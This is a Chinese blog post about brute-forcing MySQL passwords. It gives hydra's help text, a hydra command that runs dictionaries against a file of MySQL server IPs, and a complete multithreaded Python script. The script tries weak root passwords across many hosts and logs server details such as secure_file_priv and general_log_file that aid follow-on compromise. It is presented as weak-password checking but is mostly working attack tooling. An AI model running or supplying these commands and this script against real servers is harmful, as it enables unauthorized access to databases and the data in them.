爆破mysql口令
2020-02-29 本文已影响0人
sunnnnnnnnnny
如何自动化检测Mysql的弱口令,这里介绍介绍两种方式。
一、hydra
hydra是一个口令爆破工具,kali系统自带。
hydra的使用帮助
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-c TIME] [-ISOuvVd46] [service://server[:PORT][/OPT]]
Options:
-R restore a previous aborted/crashed session
-I ignore an existing restore file (don't wait 10 seconds)
-S perform an SSL connect
-s PORT if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-x MIN:MAX:CHARSET password bruteforce generation, type "-x -h" to get help
-y disable use of symbols in bruteforce, see above
-e nsr try "n" null password, "s" login as pass and/or "r" reversed login
-u loop around users, not passwords (effective! implied with -x)
-C FILE colon separated "login:pass" format, instead of -L/-P options
-M FILE list of servers to attack, one entry per line, ':' to specify port
-o FILE write found login/password pairs to FILE instead of stdout
-b FORMAT specify the format for the -o FILE: text(default), json, jsonv1
-f / -F exit when a login/pass pair is found (-M: -f per host, -F global)
-t TASKS run TASKS number of connects in parallel per target (default: 16)
-T TASKS run TASKS connects in parallel overall (for -M, default: 64)
-w / -W TIME wait time for a response (32) / between connects per thread (0)
-c TIME wait time per login attempt over all threads (enforces -t 1)
-4 / -6 use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
-v / -V / -d verbose mode / show login+pass for each attempt / debug mode
-O use old SSL v2 and v3
-q do not print messages about connection errors
-U service module usage details
-h more command line options (COMPLETE HELP)
server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
service the service to crack (see below for supported protocols)
OPT some service modules support additional input (-U for module help)
Supported services: adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp
Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
v3.0. The newest version is always available at https://github.com/vanhauser-thc/thc-hydra
Don't use in military or secret service organizations, or for illegal purposes.
These services were not compiled in: afp ncp oracle sapr3.
Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup.
E.g. % export HYDRA_PROXY=socks5://l:p@127.0.0.1:9150 (or: socks4:// connect://)
% export HYDRA_PROXY=connect_and_socks_proxylist.txt (up to 64 entries)
% export HYDRA_PROXY_HTTP=http://login:pass@proxy:8080
% export HYDRA_PROXY_HTTP=proxylist.txt (up to 64 entries)
Examples:
hydra -l user -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -l admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P pws.txt -M targets.txt ssh
常用爆破字典可使用kali自带的/usr/share/wordlists/
或者参考https://gitee.com/molok/Blasting_dictionary
使用下面的命令爆破mysql数据库,其中3306_ips. txt为mysql 服务器的ip地址列表,user. txt和password. txt为用户和口令的字典。-q表示不输出错误信息,-f表示每个ip爆破出一个正确口令就终止爆破,-o表示将结果保存在文件中。
hydra -L user.txt -P password.txt -M 3306_ips.txt -o hack_result.txt -q -f mysql
结果
hydra爆破mysql数据库结果
可参考 https://www.jianshu.com/p/4da49f179cee
二、使用python爆破mysql
使用Python的mysql客户端连接mysql进行爆破
python 连接mysql数据库可参考https://www.liaoxuefeng.com/wiki/897692888725344/932709047411488
代码如下
brute_mysql.py
#-*- coding:utf-8 -*-
# author:wlj
# time:2020/2/29 22:20
# 使用python对mysql数据库口令进行爆破
import mysql.connector
import threading
import queue
task_queue = queue.Queue()
#口令字典
weak_pwd_list = ['root','123456','12345','mysql','111111','12345678']
#互斥量,用于控制线程对task_queue变量的访问
threadLock = threading.Lock()
def test(ip):
for password in weak_pwd_list:
try:
conn = mysql.connector.connect(host=ip,user='root',password=password,database='mysql',port=3306) #连接数据库
cursor = conn.cursor()
sql = 'SELECT @@global.basedir,@@global.general_log_file,@@global.version,@@global.version_compile_os,@@global.secure_file_priv;'
cursor.execute(sql)
basedir,general_log_file,version,version_compile_os,secure_file_priv = [str(x) for x in cursor.fetchone()]
#print(basedir,general_log_file,version,version_compile_os,secure_file_priv)
cursor.close()#关闭数据库
conn.close()
print('%s,%s,%s'%(ip,'root',password))
formart_str = '%s,'*8+'\n'
#将结果存入文件
open('mysql_weak_pwd.csv','a').write(formart_str%(ip,'root',password,basedir,general_log_file,version,version_compile_os,secure_file_priv))
return
except Exception as e:
continue
def brute_mysql():
global task_queue
while True:
# 获取锁,用于线程同步
threadLock.acquire()
if task_queue.empty():
threadLock.release()
return
ip = task_queue.get()
threadLock.release()
test(ip)
def main():
ip_list = open('3306_ips.txt','r').read().split('\n')
open('mysql_weak_pwd.csv','w').write('ip,user,password,basedir,general_log_file,version,version_compile_os,secure_file_priv\n')
for ip in ip_list:
ip = ip.strip()
if ip:
task_queue.put(ip)
threads = []
for i in range(0,200):
t = threading.Thread(target=brute_mysql)
t.start()
threads.append(t)
for t in threads:
t.join()
main()
结果
python扫描结果
